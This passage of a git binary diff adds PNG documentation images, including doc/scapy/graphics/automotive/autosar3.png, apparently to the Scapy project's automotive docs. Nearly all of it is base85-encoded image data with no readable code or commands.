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 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/autosar3.png b/doc/scapy/graphics/automotive/autosar3.png new file mode 100644 index 0000000000000000000000000000000000000000..9568a240fbd619d822dfb4783b563a31d0a8cc2b GIT binary patch literal 114250 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 tHo(&4PlafEq_noCrcz*DKaH zH3jA7DxiFbujxtP=p=2#;H@>agoK1)p|?>F-&PtLnpCSMaqP!alR|Gm&(!)`%!sba z1l>eaOUwB2>=R22{e68;fXPU^f2Q59%w&*wmu_rgf@Rm8#PfOgA3n4on^aT7Ch!MA zjb=DK?MlZjyDpSVMlYLB*CGRPMr!>r9UVc>dkH~}=!2ynKG4#0?u@t3%g)WU=&6d( z=sqlbyAzpC>M(Hmor+TpF50T91ZmY`8KI%{Z>_)jUT2dq2h*@~bo4JMP(o(Lyn4le zjm82>KYpZhc6M%leTH_Qz)fvSX#^S;uX*^enW^cM-%1EJNq}9myYhq)wEqQ4D^b+J zS15NYD#j!xUatt{D*gJE18A%~Mm1=3e&&xsO}_IGC##tL3I_)V&)NPL;7NN_RDA8M z+Y5M9gBSwt-erBRc|UgNsd3a<{VY3vM79}DAK~>#$;&|2rMS5n;mQLI_FBlbPMOBRM@#7o7E=cJ>jk6#6CM_r^*wI-Uv_(v8-?3xs z(bej5U2J6)6uJ{r3RE;TL+lC(5f~|4;*FAb@_qVr)2h|0Zvxd>PfFW&?Mt`*%7n&H z%;z(ICGkXx06+gqBvdJ?LT7L92@6YIgctb8I=iL0_N6Y|l3*`Z31hm$hY#zYJlTnw zQw&ZQ5UHn_J}@{~T2itK<%No#Ud_{UcUM=}D6nxX0@|`Um7g?VKr8A_Ly?HCk^tJ# zv9T*)S;Cr;m%%}{hNb{Kkyt@2RkUO~kj0q|b-MleNgX`}q`w}t6coIyqQV^DEK=I) z?mB~Vb15MAx(urm5CY6TJ&@Lza$cC77@e5VrAgL(_&&hj{|Rmhidu@K(K$OQjNQr| zDeyx;5j>BgF1o-x4_2+8>%8rOjBOZ;sNO~;C1clC?1uU0=ZEbsUGmM(SG+53bPctX zKW8B-Mp{PZ1iS6UZ|PSG3k$1U=O(|~*1a-Pkd>D=#}lA}=*%9;yI^@(OREy)oiv-r ziXP@9?xUyBUM0O|9h<*??JQ+fE(4qi81b2?y6#DRee|xd?3{j)3@MAW|=Nt|gz!q_Lt83<~N7n9-55zPyH?srNmVe8zvL9(vjN`Bdsbb_)Dgy=T`1vz1TzQcl;NjQqSn;NM^RW}8{9{Qe1#5IlH>-z-E z9-%UxI{y|Fz7mi~%DjxKxw+Z&=g0f%hYz#x{&5M=1B?cHrtZG@F;XfxG*p+v*52Np zl!(McQBO}#LS3t>s+wq$x8J9O;!#0lfQuJHi9SQ*Iron!L+g2XLJPd+VnKQVzScFC z6BMv*o0MtM3V(lpszY}njsdNjVgD?@rEmTA_M&KrOoy7jae-&H@^15i#_SQshr;)Yop#R6_Te0crFjde);68s3-!PELn8wh9c z{!3zm(7`((*XZZDO3jY<`yty)-@T(67#Ohp{G8s`&(D5o(F@;!;P@0G%I6na2S|7f z3|s?AekA8W0dZkN7^)|~px~NhgA5g5SL6cSOC1{Q7Lq;|&5LMT0-HA7ynXw4@5I44 zZT@uhP9}oEj~%w{_$BByCz`cb>0bbNsnxF%lxcbOxag z*aV1$P)DW62+Kt4=O)_(`q9Qc`J+9tRM~Bb0x|R2}RW zq#{UUFVp3;?Cc~_-6K@0Og?ob$%~1JjpF%YAoe1ANUR$g8IhLUf^(BN_gs%L`R&`c z(?4!&-8p-V%rpJ7r{2q{F`S_+)V0MS>SBOrDB}e!N=Z?3ePgvLYNRprDUi zij$+`oyNDHfH#c~96n4BT}nU4aqDnf{;9zX-2goc3k%ICdEKpDx^B~>{OHj%n>W9Z zSG9^(@=68z<}^V#Dzfjgj?}hHevto*JpJCI7lS~Lu&HTIgL-EBhwkq@DFqZQ zT~Q&T`^F-Xw>`x~nHykDqVfdlbEt*7_&p-h6a5n9t|ElP4|4*}(u=z9PGP;jhK8)X zqL*|mlR59DY;XJZ>({ys8&==foHU5ZNKIXrsF&;u43+xTz$geh69pan<=&cT+M788 z#(>VL)nmKtI*Kv{mh%>TOJm3TM8g744sUO7Nhzu2ZY!|juUIdJw6Cw%ex%^SaOj@6 z8ki>}?LdMqKwq~=NE|qFq}nQ=@%8KNKYDvDP;ydVzjjZq{g!2K;W=7NxtvEe_pNT< zzke0M_!LLo*O<%&O1&mP<(QSA2g`_xWrVsQD02nMsN~s??C9wPBpVwWM@pKlBIN(s zix;A5MJ|fzKY#q_Kwm5ZR5P=*3`UN{qG%wPb`o6%NG)#a6a+{>EDOLQ%Z3D&2RqOE zqPBE)hbvd0y!jtaTHLLwEq<>X+6koQEp&8rsjg$@xF972%`De30j2p-)pVOyPUVI1 z4G<`Ft7~d%4rpr9k>-ztHuIATZ1mZc{i`sYvL7zuA6N#Xg^?M+Q=;Jgw%20fSLcop6K(d(Y#xBFVMcZBgNi_g;)iXS|9 zkX#IWhUDwJcj_x7x-ME;Zh!Onxtru~Qg^{lL{T;1FjdR$MvwZ1R;;f+#E1GH!`IZ_@5JU;=t znt!;vZHu_L-bwimClxC+uj)r~ekkg(WN$yeUZY`8H;U{n{pB_I7J$46kfnuG8FNgtS-92!IX$L8hDOEfViA8yEbhVC=n z;m7#o#fu_;}au7+ryz8$lmia~Y}E4gTu|a0x=WJX`ZP^!4l4_YA@_cLD3- z*GkBA#>R#LdoE^>9^W{(<@S3!pbLU0fmwhSOF@0@d#iaM(Z^LPc}&tNxD5M4rbH~J zdM~)6*sVax48YYZ!ui61GO6BNOe7LKp2za*Yas{}k`Q|hbDak4@b0s9Si(a_!+(aMonEg-Wh7yLG|DEvnW4Wq_a+BvM~nzCswcTtLZncef19doRp7iRq`VKu8O?9=HwGNhl`SVRUGde$J(&fgS6v?vr)wTSq`WwA?jo)^tFpKDve3c4vCk z>Fv9{W|@hWYLISu1@LgwjvasE?p}=_RAggj-iQeR*f2}uVJ|@Y(7h?32rMitn6*_R ztvWk8RxmO$K9YB$fzYK9o*W-v1h7RifKW=v-(_G}1VMtaL9TpKarC6VelTuEjoBym zOGRHlvdUpeLS+!m!0yMp^$}D0r%25Q%wehcj;cHggmGf=NS=lzF1`oF3L<%J`uXEf z`DY^Tj>T(PM!Y`_ep3YP7L)0yjGVli8)r*FfY!5tP7659kL;L9Yai3k3Zo zA=%ul9}x*T%wo;jwVm&7ZqiWxutcC5S~Vm{Q_#ZTYuB{pWt5fq(1+B(d~DkCsIv{l zlRnD>#DZ-WV>I~mKzN01;X)wfl(;5v1ENz9^pTaDTMCIA_uGH^v>@nDgmG_Q-BbKS z34j9*NTIB(49;tE=I%us8}aJLiq~Hrf6;{_cZC{3bTV(wp~1oHD4m3g)3S+|0nh86 zbu-481@lN*k4Z6<6A10MZr>gQ-tI<8*Wgb{N}@xq`J*}|B_*YL&Rk+C;qG5>is@L60^;0b+p65m!6gJM|e@-g9YTO2t2A7}^^ZEo~`g zF99PRgZ_jIg20$UYLt|g4!C!Z4WjtQ2o2rg?@(&eTt>M_d(>=?KkA({D3E0S575ixT^|J} zx7Hl;j(wM@z1b60Q3g(){y023<^qwY*N#a(EykK$aybbbMIk6 zNnTCK@I)(GsrJj4GPK3iOFbH$`7?8KPr;;9GC1^*z6{*5m!TD@o;bk<)>MXP@gMs= z(PZ)zhfEF_`J-*Q*4SED&nquGJG())4Z5!{ziQw{F)_{N-3b^yY~P;Xltd&gjPBGA z9^8BIAhou(Ht99#7aC~Jo;};wUZ@OyDeUR3TM0Kq2s%JF%ACq{l9pxiEaf9Y`-u1q z;CijL_Gm;CJwgVQ_2%QpuU>nuS;4LB&5Z${|APmdO4A*yJ*Qe-RGuBy)P%gV_OGvD z*D^WF)W`fCR5K8dx5vb!u(35CbCH1BOTZ;@m$$H9w}+PJINZX4nT_-?>#LZUmB4Wy zAIdO}jg6ILGoe*A0fa%JKPrc@3)_(+N5C+%w3~s#DxkXttT1e z*^BBW6`@Q+PT*&{I$C#tuNbquo-wE@xKuf)1e*LxjN4G*Nqs>DNuGF&$M3>MGnscq zv#_ysgFletA?*hK6yz>ZSZbn`Q=I4wk)~7^d=?ojFI-T;c96zj`vk>JucJJv0o}Fq z+c$%rY>auySTVBq5Nl{^AqD6+$UDMU7$pyrllRDmL)1EFi8NtRf35JK>jP^ z{A=(TJ%x%OO|cJwL%_r>rY_CY_(*!syFxZe*!?0bj6vRII3zxP z3yeMN=4sP>w8^@I3B-}m+1c3#s2$qr2(g$Lpon+s>b_M0D*PXhVBnup)oX2Q8;#aIk_v-t&4;__A%|+bd6>9(?CGq2Lw&t3AcOPJw{i~R$kmbf zD-c|U0SyBZ0U#&L6_3iH`vhURjWa}=k@cG0siLZ?TOE$E7F5mpoOmB48DU`x1?OK! zPr3;cW&2gWj?lVVK+B< z5$-e#9FfRW`r8%8YB5LmU^)c}qPf6J0iB18!hvDtd-UNnD~BTt)g|V4YcBjxFcSHp zIKA|Ii@_o>Z(_#=^D3asblx-ZUjKM%X>nxfALD5!a*9|oh~ya+Wn{s8Vn$YY|uQ&8qjmC=0~ccD@`WeF|MGdrfvrD5ADUAFMfAHYUV#72@{9DofFBBaB^u&Pa2IvQqo}Fc-J1-JUZo3vNji@F{@T zscUF3HQx7zc1D~-uyVv@Tue+{Y>&a{wV=MjlxW!_<0LfZhrTk61xmT*{_BTc!oD;KWWb#ytz-n z?Pc`E`;n2R$nuN=aUA9Pxs9ZgS8-f3VB3=%u7o7dryiJ469;1wcgNR6mj zUW5k`vZdLXGXV&5b10i4%AHGZ5}XnNzB;OX%DkRDA4(p$ZHwLUz&zkj?h$=0oe6WH|PMS3(a zFl&+#hWnS_3uvQ7>xcAMGSHA%2S6Pe8Tmz4ZZ908m{pd@w0rsi1aI2Bx%aTi^7Q>c z+x6Ok&d!xEA~^QfuVrOr)z7%V0>w`vjMn? zJxVtn?{0Q<8F-v35fHF!iTUee34okv`1I*hfYFV_kuaJ({aYQ7 zSORl$gy!Ap?aN?az+D2qY7Bw=0|GjqhAa8z=H^z_z0l&b{+3S7bk*NSOBko) z)8et-0KpmpW=$+Vc;e~#KQ+*K%H?Z(Flj)ZQxe~no0}Pum+1Deb;dCp#A$B@8}LUb zcmk<|Ft!^H9wem8`e2|2*9pc~M-2=T#?MJ`8SL1;olJ5-K#8{#d}Q7A@_AZ85|R0A zkS#Dcy?X5$v4F=sd9tU6O!wW~vPbnv^!U`{`EnimeaWnP`*tQIjVjP`n)}2B^|*S@ zChJ@8Pb0HSz>(_`bVWf1h^PQioFtWQoaee8(r*x?&Aj~ln~{-Jkg2tsW?sigi;B{o z%CrdpM#B^|2*qASB;vQk4b*_;&k_@9As9WtesaA=X^svWwoiY>niZKgttBY!Qt173 zT)Q;;;ZFw;4Agee-oi{EB>D#NuSGZ{EZgreQo(9;&g+dY<;%ptzOd$=gvowHGYRai z$DeP6U#`MPT}@y;v_%SRGhq`}jY)gqjYFI~V=_3iodYfD3K{fZP(biIY8@ES)}&H{ zdxbQ~5fKqLU=VcdXTn@^E!=Ld9vAS2--E7$H9PB4x5UV^@)b9 z%ruzCZ3F=Vf!~KR8iS$F>$`3kD1hG3psAFd0y%AIG1PpplN!FX44e8_@M}PJgDSxf zyn;@+R5s+=nSBCQuvQAO~RShCrI7)L_Wo0)45^<6->};Tz4nz&Mw^~X{3M15V5G?S9FpOU} zAuGhi#mRh=u-1Hf z_cf*P0oV#zGnv5EF)*M4(-o3TqxakQ?@x*ExuGEdtOV0rKj4B(FCTN}orsZ!?t%s} zJzC1R9Cb4@{P27W`I5mtu^uAgh^Yt9Bd_|80zq^a!fxSdLAV9NBZEONVbvg^4X#lQ zs)>M+&>eLOh}nmzSL7UExrGx0k^X+D(Kv(=BNQAtQrVcI9_GRzHtI6B&?3bWrj zj0Z{}*o?vV*2rl9D%H`~7fc{3Tsg8+fM~?Gf?EIN<;$xeR78nxd6rKxqHDPgvlY0+ 